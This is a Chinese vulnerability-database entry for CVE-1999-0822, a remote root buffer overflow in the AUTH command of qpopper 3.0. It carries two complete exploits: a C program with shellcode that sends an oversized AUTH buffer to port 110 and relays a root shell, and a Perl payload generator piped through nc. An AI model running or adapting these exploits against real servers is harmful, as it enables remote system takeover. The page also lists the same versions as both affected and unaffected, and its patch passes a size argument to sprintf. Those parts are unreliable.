CVE-1999-0822
CVSS10.0
发布时间 :1999-11-30 00:00:00
修订时间 :2008-09-09 08:36:00
NMCOES    

[原文]Buffer overflow in Qpopper (qpop) 3.0 allows remote root access via AUTH command.


[CNNVD]Qualcomm qpopper AUTH命令远程缓冲区溢出漏洞(CNNVD-199911-082)

        
        qpopper是Qualcomm的pop3服务器,是一个自由软件。
        Qualcomm qpopper (3.x)版本发现存在缓冲区溢出问题。可能被远程攻击者用以获得服务器的root用户权限。
        当向qpopper服务器发送一个带超长参数的AUTH命令,就会发生溢出,问题出在pop_msg.c的68行左右,vsprintf() 或 sprintf()没有进行边界检查。由于该进程是以root用户权限运行的,所以,入侵者可构造特定的数据传递给服务器,以root用户权限执行命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:qualcomm:qpopper:3.0b20
cpe:/a:qualcomm:qpopper:3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0822
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0822
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-082
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/830
(UNKNOWN)  BID  830

- 漏洞信息

Qualcomm qpopper AUTH命令远程缓冲区溢出漏洞
危急 边界条件错误
1999-11-30 00:00:00 2005-10-20 00:00:00
远程  
        
        qpopper是Qualcomm的pop3服务器,是一个自由软件。
        Qualcomm qpopper (3.x)版本发现存在缓冲区溢出问题。可能被远程攻击者用以获得服务器的root用户权限。
        当向qpopper服务器发送一个带超长参数的AUTH命令,就会发生溢出,问题出在pop_msg.c的68行左右,vsprintf() 或 sprintf()没有进行边界检查。由于该进程是以root用户权限运行的,所以,入侵者可构造特定的数据传递给服务器,以root用户权限执行命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在漏洞修补之前,暂时停止使用该程序。
        厂商补丁:
        Qualcomm
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.eudora.com/freeware/qpop.html

- 漏洞信息 (19645)

Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (1) (EDBID:19645)
unix remote
1999-11-30 Verified
0 Mixter
N/A [点击下载]
source: http://www.securityfocus.com/bid/830/info

There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.

/*

 * Qpopper 3.0b remote exploit for x86 Linux (tested on RedHat/2.0.38)

 *

 * Dec 1999 by Mixter <mixter@newyorkoffice.com> / http://1337.tsx.org

 *

 * Exploits pop_msg buffer overflow to spawn a remote root shell.

 * This probably works with the old qpop2 code for bsd, solaris anyone?

 * 

 * WARNING: YOU ARE USING THIS SOFTWARE ON YOUR OWN RISK. THIS IS A

 * PROOF-OF-CONCEPT PROGRAM AND YOU TAKE FULL RESPONSIBILITY FOR WHAT YOU

 * DO WITH IT! DO NOT ABUSE THIS FOR ILLICIT PURPOSES!

 */



#include <stdio.h>

#include <string.h>

#include <unistd.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <errno.h>



#define NOP		0x90

#define LEN		1032

#define CODESTART	880

#define RET		0xbfffd655



/* x86 linux shellcode. this can be a simple execve to /bin/sh on all

   systems, but MUST NOT contain the characters 'x17' or 'x0c' because

   that would split the exploit code into separate arg buffers        */



char *shellcode =

"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab"

"\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80"

"\xe8\xd9\xff\xff\xff/bin/sh";



unsigned long resolve (char *);

void term (int, int);

unsigned long get_sp ();



int 

main (int argc, char **argv)

{

  char buffer[LEN];

  char *codeptr = shellcode;

  long retaddr = RET;

  int i, s;

  struct sockaddr_in sin;



  if (argc < 2)

    {

      printf ("usage: %s <host> [offset]\n", argv[0]);

      printf ("use offset -1 to try local esp\n");

      exit (0);

    }



  if (argc > 2)

    {

      if (atoi (argv[2]) == -1)

	{

	  /* 8000 = approx. byte offset to qpopper's top of stack

	     at the time it prints out the auth error message */

	  retaddr = get_sp () - 8000 - LEN;

	  printf ("Using local esp as ret address...\n");

	}

      retaddr += atoi (argv[2]);

    }



  for (i = 0; i < LEN; i++)

    *(buffer + i) = NOP;



  for (i = CODESTART + 2; i < LEN; i += 4)

    *(int *) &buffer[i] = retaddr;



  for (i = CODESTART; i < CODESTART + strlen (shellcode); i++)

    *(buffer + i) = *(codeptr++);



  buffer[0] = 'A';

  buffer[1] = 'U';

  buffer[2] = 'T';

  buffer[3] = 'H';

  buffer[4] = ' ';



  printf ("qpop 3.0 remote root exploit (linux) by Mixter\n");

  printf ("[return address: 0x%lx buffer size: %d code size: %d]\n",

	  retaddr, strlen (buffer), strlen (shellcode));



  fflush (0);



  sin.sin_family = AF_INET;

  sin.sin_port = htons (110);

  sin.sin_addr.s_addr = resolve (argv[1]);

  s = socket (AF_INET, SOCK_STREAM, 0);



  if (connect (s, (struct sockaddr *) &sin, sizeof (struct sockaddr)) < 0)

    {

      perror ("connect");

      exit (0);

    }



  switch (write (s, buffer, strlen (buffer)))

    {

    case 0:

    case -1:

      fprintf (stderr, "write error: %s\n", strerror (errno));

      break;

    default:

      break;

    }

  write (s, "\n\n", 1);

  term (s, 0);



  return 0;

}



unsigned long

resolve (char *host)

{

  struct hostent *he;

  struct sockaddr_in tmp;

  if (inet_addr (host) != -1)

    return (inet_addr (host));

  he = gethostbyname (host);

  if (he)

    memcpy ((caddr_t) & tmp.sin_addr.s_addr, he->h_addr, he->h_length);

  else

    {

      perror ("gethostbyname");

      exit (0);

    }

  return (tmp.sin_addr.s_addr);

}



unsigned long

get_sp (void)

{

  __asm__ ("movl %esp, %eax");

}



void

term (int p, int c)

{

  char buf[LEN];

  fd_set rfds;

  int i;



  while (1)

    {

      FD_ZERO (&rfds);

      FD_SET (p, &rfds);

      FD_SET (c, &rfds);

      if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1)

	return;

      if (FD_ISSET (c, &rfds))

	{

	  if ((i = read (c, buf, sizeof (buf))) < 1)

	    exit (0);

	  else

	    write (p, buf, i);

	}

      if (FD_ISSET (p, &rfds))

	{

	  if ((i = read (p, buf, sizeof (buf))) < 1)

	    exit (0);

	  else

	    write (c, buf, i);

	}

    }

}

		

- 漏洞信息 (19646)

Qualcomm qpopper 3.0/3.0 b20 Remote Buffer Overflow Vulnerability (2) (EDBID:19646)
unix remote
1999-11-30 Verified
0 Synnergy Networks
N/A [点击下载]
source: http://www.securityfocus.com/bid/830/info
 
There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.

#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote buffer overflow exploit for QPOP 3.0b<=20 
# running on Linux.
# (based on code by sk8@lucid-solutions.com)

# * Author:
#
# headflux (hf@synnergy.net)
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Usage:
# ./qpop-linux.pl <offset> | nc -v <hostname> 110

# *** Synnergy Networks

$nop    = "\x90";
#$offset        = 0;

$shell  = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa";
$shell  .= "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04";
$shell  .= "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff";
$shell  .= "\xff\xff/bin/sh";

#$i     = 0;
$buflen = 990;
$ret    = 0xbfffd304;
$cmd    = "AUTH ";

if(defined $ARGV[0])
{
        $offset = $ARGV[0];
}

$buf = $nop x $buflen;
substr($buf, 0, length($cmd))		= "$cmd";
substr($buf, 800, length($shell))       = "$shell";

for ($i=800+length($shell) + 2; $i < $buflen - 4; $i += 4)
{
        substr($buf, $i, length($ret + offset)) = pack(l,$ret + $offset);
}

# substr($buf, $buflen - 2, 1)  = "\n";
# substr($buf, $buflen - 1, 1)  = "\n";

#$buf   .= "\n";

printf STDOUT "$buf\n";

# EndOfFile
		

- 漏洞信息

6992
Qpopper pop_msg.c AUTH Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Qpopper. The Qpopper fails to check the boundary in "pop_msg.c" function, resulting in a buffer overflow. With a specially crafted request, a remote attacker can overflow a buffer and gain root privileges on the system, resulting in a loss of confidentiality and integrity.

- 时间线

1999-11-30 Unknow
1999-11-30 Unknow

- 解决方案

Upgrade to version 3.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Qualcomm qpopper Remote Buffer Overflow Vulnerability
Boundary Condition Error 830
Yes No
1999-11-30 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Mixter <mixter@newyorkoffice.com> on Nov 30, 1999.

- 受影响的程序版本

Qualcomm qpopper 3.0 b20
Qualcomm qpopper 3.0
Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4

- 不受影响的程序版本

Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4

- 漏洞讨论

There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.

- 漏洞利用

An exploit has been made available.

- 解决方案

The newest version, qpopper3.0b22 (which is patched), is available at:

ftp://ftp.qualcomm.com/eudora/servers/unix/popper/

This is a temporary patch, provided by Mixter <mixter@newyorkoffice.com> in his post to BugTraq.
# apply this in the qpopper3.0b20/popper/ directory with patch < qp3b20.patch
--- pop_msg.c.old Mon Nov 29 23:42:03 1999
+++ pop_msg.c Mon Nov 29 23:52:08 1999
@@ -65,7 +65,7 @@
/* Append the message (formatted, if necessary) */
if (format) {
#ifdef HAVE_VPRINTF
- vsprintf(mp,format,ap);
+ vsnprintf(mp,MAXLINELEN - 100, format,ap);
#else
# ifdef PYRAMID
arg1 = va_arg(ap, char *);
@@ -74,9 +74,9 @@
arg4 = va_arg(ap, char *);
arg5 = va_arg(ap, char *);
arg6 = va_arg(ap, char *);
- (void)sprintf(mp,format, arg1, arg2, arg3, arg4, arg5, arg6);
+ (void)sprintf(mp,MAXLINELEN - 100, format, arg1, arg2, arg3, arg4, arg5, arg6);
# else
- (void)sprintf(mp,format,((int *)ap)[0],((int *)ap)[1],((int *)ap)[2],
+ (void)sprintf(mp,MAXLINELEN - 100, format,((int *)ap)[0],((int *)ap)[1],((int *)ap)[2],
((int *)ap)[3],((int *)ap)[4]);
# endif
#endif

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站